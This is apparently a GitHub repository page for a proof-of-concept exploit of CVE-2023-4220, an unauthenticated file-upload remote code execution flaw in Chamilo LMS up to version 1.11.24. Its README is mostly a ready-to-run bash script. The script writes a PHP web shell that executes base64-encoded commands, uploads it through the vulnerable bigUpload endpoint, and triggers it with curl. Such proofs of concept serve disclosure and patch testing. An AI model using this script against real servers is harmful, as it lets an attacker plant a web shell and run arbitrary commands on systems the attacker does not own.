Skip to content

charlesgargasson/CVE-2023-4220

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
README.rst
README.rst
 
 

Repository files navigation

CVE-2023-4220 RCE Chamilo 1.11.24


Chamilo LMS <= 1.11.24 (Beersel 31/08/2023)
Unauthenticated File Remote Code Execution on "Big Upload" lib

Identify version : /documentation/changelog.html

POC EXPLOIT CVE RCE VULN

#!/bin/bash
HOST='http://lms.domain.com'
CMD='id'

URL_UPLD='main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
URL_FILE='main/inc/lib/javascript/bigupload/files/rce.php'

cat <<'EOF'>/tmp/rce.php
<?php
$a=popen(base64_decode($_REQUEST["aoOoy"]),'r');while($b=fgets($a,2048)){echo $b;ob_flush();flush();}pclose($a);
?>
EOF

curl -F 'bigUploadFile=@/tmp/rce.php' "$HOST/$URL_UPLD"
CMD=$(echo $CMD|base64 -w0| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")
curl "$HOST/$URL_FILE?aoOoy=$CMD"

About

RCE Chamilo 1.11.24

starlabs.sg/advisories/23/23-4220/

Topics

exploit poc rce lms cve chamilo chamilo-lms 2023 cve-2023-4220 beersel bigupload

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published